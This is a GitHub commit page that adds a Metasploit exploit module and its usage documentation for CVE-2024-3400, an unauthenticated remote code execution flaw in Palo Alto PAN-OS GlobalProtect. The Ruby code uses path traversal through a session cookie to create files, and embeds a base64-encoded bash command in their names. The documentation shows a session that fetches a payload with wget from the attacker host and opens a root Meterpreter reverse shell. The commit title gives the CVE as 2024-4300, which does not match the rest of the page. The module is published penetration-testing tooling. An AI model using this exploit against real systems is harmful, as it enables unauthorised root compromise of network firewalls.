Skip to content

Commit

Permalink
Land #19101, Exploit module for CVE-2024-4300 - Palo Alto Networks PA…
Browse files Browse the repository at this point in the history
…N-OS

Merge branch 'land-19101' into upstream-master
  • Loading branch information
bwatters-r7 committed Apr 19, 2024
2 parents 3697d4c + 2ad13ac commit 4733d1d
Show file tree
Hide file tree
Showing 2 changed files with 255 additions and 0 deletions.
112 changes: 112 additions & 0 deletions documentation/modules/exploit/linux/http/panos_telemetry_cmd_exec.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,112 @@
## Vulnerable Application
This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that
allow an unauthenticated attacker to create arbitrarily named files and execute
shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or
GlobalProtect Portal enabled and telemetry collection on (default). Affected versions
include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
< 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to
one hour to execute, depending on how often the telemetry service is set to run.

For a technical analysis of the vulnerability, read our [Rapid7 Analysis](https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis).

## Testing
Boot a vulnerable PAN-OS VM or device, then authenticate to the management web service with default credentials. From the
web dashboard, configure a GlobalProtect [Portal](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-portals/set-up-access-to-the-globalprotect-portal)
and/or [Gateway](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-gateways/configure-a-globalprotect-gateway).
With either or both started, the `gpsvc` service will begin serving an HTTPS service on port 443 for the second
network interface. Confirm that the web service presents a Palo Alto Networks login page when viewed. This web application
is the target of the exploit, and the '/global-protect/login.esp' page should be accessible.

The exploit has been tested against PAN-OS 10.2.9, and it should also be effective against other similarly-configured 10.2, 11.0,
and 11.1 versions.

## Verification Steps

1. Start msfconsole
2. `use exploit/linux/http/panos_telemetry_cmd_exec`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set payload cmd/linux/http/x64/meterpreter_reverse_tcp`
5. `set LHOST eth0`
6. `check`
7. `exploit`

## Scenarios

### Linux Command

Note: Ensure the target is vulnerable to unauthenticated file creation with the `check` command.

Note: Since it can take up to one hour to establish code execution, the listener should be left running for that period.

Note: In the standard PAN-OS configuration, the payload is delivered to the GlobalProtect interface IP, but the shell will return via a different PAN-OS management interface IP.

```
msf6 > use exploit/linux/http/panos_telemetry_cmd_exec
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > show options
Module options (exploit/linux/http/panos_telemetry_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI /global-protect/login.esp yes An existing web application endpoint
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME EkcxbboZMyD no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /var/tmp yes Remote writable dir to store payload; cannot contain spaces
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Default
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set RHOSTS 192.168.50.226
RHOSTS => 192.168.50.226
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LHOST 192.168.50.25
LHOST => 192.168.50.25
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LPORT 8585
LPORT => 8585
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > check
[+] 192.168.50.226:443 - The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ipteqmbl-regular.woff2 NOTE: This file will not be deleted
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > exploit
[*] Started reverse TCP handler on 192.168.50.25:8585
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ikxrpbmq-regular.woff2 NOTE: This file will not be deleted
[*] Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload
[*] Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled
[*] Meterpreter session 1 opened (192.168.50.25:8585 -> 192.168.50.216:48310) at 2024-04-18 14:53:09 -0500
[!] This exploit may require manual cleanup of '/opt/panlogs/tmp/device_telemetry/minute/lyne`echo${IFS}-n${IFS}d2dldCAtcU8gL3Zhci90bXAvdWdWZlhXUnhWIGh0dHA6Ly8xOTIuMTY4LjUwLjI1OjgwODAvcUpPXzJ2MUFPVkRIc2hsVVIyRHVzQTsgY2htb2QgK3ggL3Zhci90bXAvdWdWZlhXUnhWOyAvdmFyL3RtcC91Z1ZmWFdSeFYgJg==|base64${IFS}-d|bash${IFS}-`' on the target
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.50.216
OS : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
143 changes: 143 additions & 0 deletions modules/exploits/linux/http/panos_telemetry_cmd_exec.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,143 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution',
'Description' => %q{
This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that
allow an unauthenticated attacker to create arbitrarily named files and execute
shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or
GlobalProtect Portal enabled and telemetry collection on (default). Affected versions
include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
< 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to
one hour to execute, depending on how often the telemetry service is set to run.
},
'License' => MSF_LICENSE,
'Author' => [
'remmons-r7', # Metasploit module
'sfewer-r7' # Metasploit module
],
'References' => [
['CVE', '2024-3400'], # At the time of announcement, both vulnerabilities were assigned one CVE identifier
['URL', 'https://security.paloaltonetworks.com/CVE-2024-3400'], # Vendor Advisory
['URL', 'https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/'], # Initial Volexity report of the 0day exploitation
['URL', 'https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis'] # Rapid7 Analysis
],
'DisclosureDate' => '2024-04-12',
'Platform' => [ 'linux', 'unix' ],
'Arch' => [ARCH_CMD],
'Privileged' => true, # Executes as root on Linux
'Targets' => [ [ 'Default', {} ] ],
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
'FETCH_COMMAND' => 'WGET',
'RPORT' => 443,
'SSL' => true,
'FETCH_WRITABLE_DIR' => '/var/tmp',
'WfsDelay' => 3600 # 1h, since telemetry service cronjob can take up to an hour
},
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
IOC_IN_LOGS,
# The /var/log/pan/gpsvc.log file will log an unmarshal failure message for every malformed session created
# The NGINX frontend web server, which proxies requests to the GlobalProtect service, will log client IPs in /var/log/nginx/sslvpn_access.log
# Similarly, the log file /var/log/pan/sslvpn-access/sslvpn-access.log will also contain a log of the HTTP requests
# The "device_telemetry_*.log" files in /var/log/pan will log the command being injected
ARTIFACTS_ON_DISK
# Several 0 length files are created in the following directories during checks and exploitation:
# - /opt/panlogs/tmp/device_telemetry/hour/
# - /opt/panlogs/tmp/device_telemetry/minute/
# - /var/appweb/sslvpndocs/global-protect/portal/fonts/
]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'An existing web application endpoint', '/global-protect/login.esp']),
]
)
end

def check
# Try to create a new empty file in an accessible directory with the exploit primitive
# This file name was chosen because an extension in (css|js|eot|woff|woff2|ttf) is required for correct NGINX routing, and similarly named files already exist in the 'fonts' directory
file_check_name = "glyphicons-#{Rex::Text.rand_text_alpha_lower(8)}-regular.woff2"
touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}")

# Access that file and a file that doesn't exist to confirm they return 403 and 404, respectively
res_check_created = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri('global-protect', 'portal', 'fonts', file_check_name)
)

return CheckCode::Unknown('Connection failed') unless res_check_created

res_check_not_created = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri('global-protect', 'portal', 'fonts', "X#{file_check_name}")
)

return CheckCode::Unknown('Connection failed') unless res_check_not_created

if (res_check_created.code != 403) || (res_check_not_created.code != 404)
return CheckCode::Safe('Arbitrary file write did not succeed')
end

CheckCode::Vulnerable("Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name} NOTE: This file will not be deleted")
end

def touch_file(file)
# Exploit primitive similar to `touch`, creating an empty file owned by root in the specified location
fail_with(Failure::BadConfig, 'Semicolon cannot be present in file name, due to the cookie injection context') if file.include? ';'

send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'headers' => {
'Cookie' => "SESSID=./../../../..#{file}"
}
)
end

def exploit
# Encode the shell command payload as base64, then embed it in the appropriate exploitation context
# Since payloads cannot contain spaces, ${IFS} is used as a separator
cmd = "echo${IFS}-n${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|bash${IFS}-"

# Create maliciously named files in both telemetry directories that might be used by affected versions
# Both files are necessary, since it seems that some PAN-OS versions only execute payloads in 'hour' and others use 'minute'.
# It's possible that the payload will execute twice, but we've only observed one location working during testing
files = [
"/opt/panlogs/tmp/device_telemetry/hour/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`",
"/opt/panlogs/tmp/device_telemetry/minute/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`"
]

files.each do |file_path|
vprint_status("Creating file at #{file_path}")
touch_file(file_path)

# Must register for clean up here instead of within touch_file, since touch_file is used in the check
register_file_for_cleanup(file_path)
end

print_status('Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload')
print_status('Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled')
end
end

0 comments on commit 4733d1d

Please sign in to comment.